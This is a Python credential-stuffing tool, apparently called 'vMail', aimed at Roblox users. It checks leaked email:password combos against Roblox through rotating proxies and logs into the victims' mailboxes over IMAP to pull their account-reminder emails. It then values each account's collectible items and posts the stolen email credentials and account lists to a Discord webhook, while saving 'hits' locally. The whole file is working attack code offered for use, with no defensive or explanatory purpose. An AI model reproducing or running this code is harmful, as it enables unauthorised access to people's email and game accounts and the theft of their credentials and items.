import datetime, requests, re, os, ctypes, random, threading, imaplib, email, random, string, os.path, json, time, colorama
os.system('mode con: cols=175 lines=30')
start_time = time.time()

domains = {}
proxy = open(os.path.dirname(__file__) + "/files/proxylist.txt", 'r').read().splitlines()
settings = json.load(open(os.path.dirname(__file__) + '/files/settings.json', 'r'))
combos =  open(os.path.dirname(__file__)  + "/files/combolist.txt", 'r').read().splitlines()
for i in open(os.path.dirname(__file__) + "/files/imapsettings.txt", 'r').read().splitlines(): 
    try: domains[i.split("|")[0]] = i.split("|")[1]
    except: pass


colorama.init(autoreset=True)
checked = 0
badmail = 0
accs = 0
proxyerror = 0
emails = 0
trap = 0
names = []

def getRap(userId):
    try:
        types = ['Hat', 'HairAccessory', 'FaceAccessory', 'NeckAccessory', 'ShoulderAccessory', 'FrontAccessory', 'BackAccessory', 'WaistAccessory', 'Gear', 'Face']
        rap = 0
        for ix in types:
            cursor = ""
            h = rapFunc(userId, ix, cursor)
            if "data" in h:
                for iv in h["data"]:
                    if 'recentAveragePrice' in iv:
                        rap = rap + iv['recentAveragePrice']
                    if 'nextPageCursor' in h and h['nextPageCursor'] != 'None':
                        cursor = h['nextPageCursor']
                    else:
                        break
        return rap
    except:
        return 0

def rapFunc(userId, i, cursor):
    try: return requests.get(f'https://inventory.roblox.com/v1/users/{userId}/assets/collectibles?assetType={i}&limit=100&cursor={cursor}').json()
    except: return 0

def getjoin(username):
    return re.search(r'Join Date<p class=text-lead>(.*?)<li class=profile-stat>', requests.get(f"https://roblox.com/user.aspx?username={username}").text).group(1)

def discordMessage(femail, passw, usernames):
    if usernames == "NO":
        return 'NO'
    global accs
    global trap
    ac = []
    rrap = 0; th = 0; accounts = []; color = 14177041
    for x in filter(lambda x: not re.match(r'^\s*$', x), usernames):
        accs += 1
        ac.append(x)
        names.append(x)

        try:
            th += 1
            userid = requests.get(f'http://api.roblox.com/users/get-by-username?username={x}').json()['Id']
            rrap = int(getRap(userid)) + rrap; join = str(re.search(r"\d\d\d\d", getjoin(x)).group(0))
            accounts.append({"name":f"Account #{th}", "value": f'{x}:{join}:{getRap(userid)}', "inline":True})
        except Exception as E:
            continue
    if rrap > 10000: color = 345322

    jsonpost = {
        "username": "vMail",
        "avatar_url": "https://i.boring.host/WZGfiCg.png",
        "embeds": [
        {
            "title": femail + ":" + passw,
            "description": str(accs) + " accounts found | username:year:rap \nMade by [Criminals](https://v3rmillion.net/member.php?action=profile&uid=1109954)",
            "color": color,
            "fields": accounts,
            "footer": {
                "text": f"vMail at {datetime.datetime.now().time()}",
            }
        }
        ]
    }
    requests.post(settings["wh"], json=jsonpost)
    trap += rrap
    return ac

def check_existing(email):
    try:
        req = requests.post('https://www.roblox.com/login/getpasswordbyemail', data={"email": email}, proxies={'https':random.choice(proxy)}, timeout=4).json()
        if req["success"] == True: return True
        if req["success"] == False and req["message"] == "Too many attempts. Please try again later.": return "RETRY"
        else: return False
    except Exception as E:
        return "RETRY"

def fetch_accounts(emailr, password, imapurl):
    mail = imaplib.IMAP4_SSL(imapurl)
    mail.login(emailr, password)
    mail.select('INBOX')
    typ, msgnums = mail.search(None, 'SUBJECT', '"Roblox Accounts Reminder"')
    if msgnums != [b'']:
        mail.select('INBOX')
        item_list = msgnums[0].split()[-1]
        result, data = mail.fetch(item_list, '(RFC822)')
        message = email.message_from_bytes(data[0][1]).get_payload()
        with open(os.path.dirname(__file__) + f"/cache/\{''.join([random.choice(string.ascii_letters + string.digits) for _ in range(15)])}.txt", 'a') as cachefile:
            cachefile.write(str(message[0]))
            cachefile.close()
            return re.search(r'Your accounts are listed below:(.*?)This message was generated by roblox.com', open(cachefile.name, 'r').read().replace('\n','@$').replace('=', '')).group(1).split("@$")
    return "NO"

def save_hits(emailu, emailp, accountzz):
    with open(os.path.dirname(__file__) + '/hits/hits.txt', 'a') as hitfile:
        hitfile.write(emailu+":"+emailp + ' --->\n')
        for xx in accountzz:
            hitfile.write(f'|> {xx}\n')
        hitfile.write('\n')
        hitfile.flush()

def cthread():
    global checked
    global proxyerror
    global accs
    global badmail
    global emails
    global trap
    while len(combos) > 0:
        logins = combos.pop(0).split(":")
        emailsent = check_existing(logins[0])
        if emailsent == True:
            emails += 1
            time.sleep(75)
            checked += 1
            accountz = discordMessage(logins[0], logins[1], fetch_accounts(logins[0], logins[1], domains[logins[0].split("@")[1]]))
            if accountz == "NO":
                continue
            save_hits(logins[0], logins[1], accountz)
        elif emailsent == False:
            checked += 1; badmail += 1
        else:
            proxyerror += 1
            combos.append(logins[0] + ":" + logins[1])

for it in range(int(settings['threads'])):
    threading.Thread(target=cthread).start()

while True:
    try:
        time.sleep(2.5)
        os.system("cls")
        print("""\t\t\t
        

███    █▄  ███▄▄▄▄      ▄████████ ███    █▄  ▀█████████▄     ▄████████ ▀█████████▄  ▀████    ▐████▀ 
███    ███ ███▀▀▀██▄   ███    ███ ███    ███   ███    ███   ███    ███   ███    ███   ███▌   ████▀  
███    ███ ███   ███   ███    █▀  ███    ███   ███    ███   ███    ███   ███    ███    ███  ▐███    
███    ███ ███   ███   ███        ███    ███  ▄███▄▄▄██▀   ▄███▄▄▄▄██▀  ▄███▄▄▄██▀     ▀███▄███▀    
███    ███ ███   ███ ▀███████████ ███    ███ ▀▀███▀▀▀██▄  ▀▀███▀▀▀▀▀   ▀▀███▀▀▀██▄     ████▀██▄     
███    ███ ███   ███          ███ ███    ███   ███    ██▄ ▀███████████   ███    ██▄   ▐███  ▀███    
███    ███ ███   ███    ▄█    ███ ███    ███   ███    ███   ███    ███   ███    ███  ▄███     ███▄  
████████▀   ▀█   █▀   ▄████████▀  ████████▀  ▄█████████▀    ███    ███ ▄█████████▀  ████       ███▄ 
                                                            ███    ███                              

        """)

        print(colorama.Fore.GREEN + f"Good emails: {emails}")
        print(colorama.Fore.CYAN + f"Total accounts: {accs}")
        print(colorama.Fore.YELLOW + f"Checked: {checked}")
        print(colorama.Fore.MAGENTA + f"Total RAP: {trap}")
        print(colorama.Fore.RED + f"Proxy errors: {proxyerror}")
        print(colorama.Fore.BLUE + f"Left: {len(combos)}")
        print(names)
    except: 
        pass
